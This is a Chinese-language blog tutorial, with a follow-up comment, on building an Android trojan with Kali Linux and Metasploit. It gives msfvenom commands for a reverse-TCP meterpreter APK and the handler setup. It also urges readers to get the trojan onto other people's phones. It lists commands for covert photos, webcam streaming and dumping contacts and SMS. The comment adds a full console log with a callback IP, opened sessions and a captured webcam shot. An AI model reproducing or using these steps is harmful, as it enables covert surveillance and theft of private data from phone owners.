如何使用kali生成木马入侵安卓手机

By admin

2018-11-24 16:35:11

浏览量1911

已赞1

行动开始

先查看kali的ip,我的是1.114


然后输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk
5555是设置的端口,可以自己更改  显示这个说明已经生成成功了


然后启动msf:msfconsole  然后输入命令:
1.use exploit/multi/handler   //加载模块

2. set payload android/meterpreter/reverse_tcp   //选择Payload

3.show options   //查看参数设置



这个payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置

1.set LHOST 192.168.1.114   //这里的地址设置成我们刚才生成木马的IP地址

2.set LPORT 5555   //这里的端口设置成刚才我们生成木马所监听的端口

3.exploit   //开始执行漏洞 开始监听,等待手机上线


靠自己发挥把木马安装到别人手机上,我这里测试就用自己的手机安装上了

安装过程360全程无提示~




红色框出的地方就说明手机上线了 然后可以输入sysinfo 查看手机信息


webcam_list 查看手机有多少个摄像头 这里显示是2个




webcam_stream  //开启摄像头
webcam_snap //隐秘拍照功能
dump_contacts //导出电话号码
dump_sms  //导出信息
可以输入?查看更多命令

好了,自己测试去吧
请勿用于非法使用
教程结束

发表评论
拖动滑块验证
»
请先 注册/登录 后参与评论

已有4 发布

默认   热门   正序   倒序
  • 5F
    admin2018-11-27 00:16:03   
    root@Kali:~# ifconfig
    eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 192.168.1.129  netmask 255.255.255.0  broadcast 192.168.1.255
            inet6 fe80::20c:29ff:fef3:4a8c  prefixlen 64  scopeid 0x20<link>
            ether 00:0c:29:f3:4a:8c  txqueuelen 1000  (Ethernet)
            RX packets 106  bytes 8696 (8.4 KiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 91  bytes 6187 (6.0 KiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
            inet 127.0.0.1  netmask 255.0.0.0
            inet6 ::1  prefixlen 128  scopeid 0x10<host>
            loop  txqueuelen 1000  (Local Loopback)
            RX packets 20  bytes 1116 (1.0 KiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 20  bytes 1116 (1.0 KiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    root@Kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=111.199.246.64 LPORT=5555 R > /root/666.apk
    [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
    [-] No arch selected, selecting arch: dalvik from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 10089 bytes
    
    root@Kali:~# msfconsole
    [-] Failed to connect to the database: could not connect to server: Connection refused
    	Is the server running on host "localhost" (::1) and accepting
    	TCP/IP connections on port 5432?
    could not connect to server: Connection refused
    	Is the server running on host "localhost" (127.0.0.1) and accepting
    	TCP/IP connections on port 5432?
    
                                                      
    
             .                                         .
     .
    
          dBBBBBBb  dBBBP dBBBBBBP dBBBBBb  .                       o
           '   dB'                     BBP
        dB'dB'dB' dBBP     dBP     dBP BB
       dB'dB'dB' dBP      dBP     dBP  BB
      dB'dB'dB' dBBBBP   dBP     dBBBBBBB
    
                                       dBBBBBP  dBBBBBb  dBP    dBBBBP dBP dBBBBBBP
              .                  .                  dB' dBP    dB'.BP
                                 |       dBP    dBBBB' dBP    dB'.BP dBP    dBP
                               --o--    dBP    dBP    dBP    dB'.BP dBP    dBP
                                 |     dBBBBP dBP    dBBBBP dBBBBP dBP    dBP
    
                                                                        .
                    .
            o                  To boldly go where no
                                shell has gone before
    
    
           =[ metasploit v4.17.21-dev                         ]
    + -- --=[ 1822 exploits - 1033 auxiliary - 316 post       ]
    + -- --=[ 539 payloads - 42 encoders - 10 nops            ]
    + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
    
    msf > use exploit/multi/handler
    msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
    payload => android/meterpreter/reverse_tcp
    msf exploit(multi/handler) > show options
    
    Module options (exploit/multi/handler):
    
       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------
    
    
    Payload options (android/meterpreter/reverse_tcp):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST                   yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Wildcard Target
    
    
    msf exploit(multi/handler) > set LHOST 111.199.246.64
    LHOST => 111.199.246.64
    msf exploit(multi/handler) > set LPORT 5555
    LPORT => 5555
    msf exploit(multi/handler) > show options
    
    Module options (exploit/multi/handler):
    
       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------
    
    
    Payload options (android/meterpreter/reverse_tcp):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  111.199.246.64   yes       The listen address (an interface may be specified)
       LPORT  5555             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Wildcard Target
    
    
    msf exploit(multi/handler) > exploit
    
    [-] Handler failed to bind to 111.199.246.64:5555:-  -
    [*] Started reverse TCP handler on 0.0.0.0:5555 
    [*] Sending stage (70525 bytes) to 192.168.1.152
    [*] Meterpreter session 1 opened (192.168.1.129:5555 -> 192.168.1.152:33923) at 2018-11-27 00:07:45 +0800
    
    meterpreter > 
    [*] 192.168.1.152 - Meterpreter session 1 closed.  Reason: Died
    webcam_snap
    [-] Error running command webcam_snap: Rex::TimeoutError Operation timed out.
    msf exploit(multi/handler) > dump_sms
    [-] Unknown command: dump_sms.
    msf exploit(multi/handler) > ?
    
    Core Commands
    =============
    
        Command       Description
        -------       -----------
        ?             Help menu
        banner        Display an awesome metasploit banner
        cd            Change the current working directory
        color         Toggle color
        connect       Communicate with a host
        exit          Exit the console
        get           Gets the value of a context-specific variable
        getg          Gets the value of a global variable
        grep          Grep the output of another command
        help          Help menu
        history       Show command history
        load          Load a framework plugin
        quit          Exit the console
        repeat        Repeat a list of commands
        route         Route traffic through a session
        save          Saves the active datastores
        sessions      Dump session listings and display information about sessions
        set           Sets a context-specific variable to a value
        setg          Sets a global variable to a value
        sleep         Do nothing for the specified number of seconds
        spool         Write console output into a file as well the screen
        threads       View and manipulate background threads
        unload        Unload a framework plugin
        unset         Unsets one or more context-specific variables
        unsetg        Unsets one or more global variables
        version       Show the framework and console library version numbers
    
    
    Module Commands
    ===============
    
        Command       Description
        -------       -----------
        advanced      Displays advanced options for one or more modules
        back          Move back from the current context
        info          Displays information about one or more modules
        loadpath      Searches for and loads modules from a path
        options       Displays global options or for one or more modules
        popm          Pops the latest module off the stack and makes it active
        previous      Sets the previously loaded module as the current module
        pushm         Pushes the active or list of modules onto the module stack
        reload_all    Reloads all modules from all defined module paths
        search        Searches module names and descriptions
        show          Displays modules of a given type, or all modules
        use           Selects a module by name
    
    
    Job Commands
    ============
    
        Command       Description
        -------       -----------
        handler       Start a payload handler as job
        jobs          Displays and manages jobs
        kill          Kill a job
        rename_job    Rename a job
    
    
    Resource Script Commands
    ========================
    
        Command       Description
        -------       -----------
        makerc        Save commands entered since start to a file
        resource      Run the commands stored in a file
    
    
    Developer Commands
    ==================
    
        Command       Description
        -------       -----------
        edit          Edit the current module or a file with the preferred editor
        irb           Open an interactive Ruby shell in the current context
        log           Display framework.log paged to the end if possible
        pry           Open the Pry debugger on the current module or Framework
        reload_lib    Reload Ruby library files from specified paths
    
    
    Database Backend Commands
    =========================
    
        Command           Description
        -------           -----------
        db_connect        Connect to an existing database
        db_disconnect     Disconnect from the current database instance
        db_export         Export a file containing the contents of the database
        db_import         Import a scan result file (filetype will be auto-detected)
        db_nmap           Executes nmap and records the output automatically
        db_rebuild_cache  Rebuilds the database-stored module cache
        db_status         Show the current database status
        hosts             List all hosts in the database
        loot              List all loot in the database
        notes             List all notes in the database
        services          List all services in the database
        vulns             List all vulnerabilities in the database
        workspace         Switch between database workspaces
    
    
    Credentials Backend Commands
    ============================
    
        Command       Description
        -------       -----------
        creds         List all credentials in the database
    
    
    Exploit Commands
    ================
    
        Command       Description
        -------       -----------
        check         Check to see if a target is vulnerable
        exploit       Launch an exploit attempt
        rcheck        Reloads the module and checks if the target is vulnerable
        recheck       Alias for rcheck
        reload        Just reloads the module
        rerun         Alias for rexploit
        rexploit      Reloads the module and launches an exploit attempt
        run           Alias for exploit
    
    msf exploit(multi/handler) > run
    
    [-] Handler failed to bind to 111.199.246.64:5555:-  -
    [*] Started reverse TCP handler on 0.0.0.0:5555 
    [*] Sending stage (70525 bytes) to 111.199.246.64
    [*] Meterpreter session 2 opened (192.168.1.129:5555 -> 111.199.246.64:60506) at 2018-11-27 00:10:31 +0800
    [*] Sending stage (70525 bytes) to 111.199.246.64
    [*] Meterpreter session 3 opened (192.168.1.129:5555 -> 111.199.246.64:60478) at 2018-11-27 00:10:32 +0800
    [*] Sending stage (70525 bytes) to 111.199.246.64
    
    meterpreter > dump_contacts
    [*] No contacts were found!
    meterpreter > dump_sms
    [*] No sms messages were found!
    meterpreter > webcam_snap
    [*] Starting...
    [+] Got frame
    [*] Stopped
    Webcam shot saved to: /root/swnuVBGh.jpeg
    meterpreter > 
    

    创始人:
    这是测试全程

    0
  • 4F
    guest2018-11-24 16:46:53   
    0
  • 3F
    默默2018-11-24 16:46:31   
    看一下
    0
  • 2F
    guest2018-11-24 16:45:34   
    可以的
    0
查看更多评论
已有0次打赏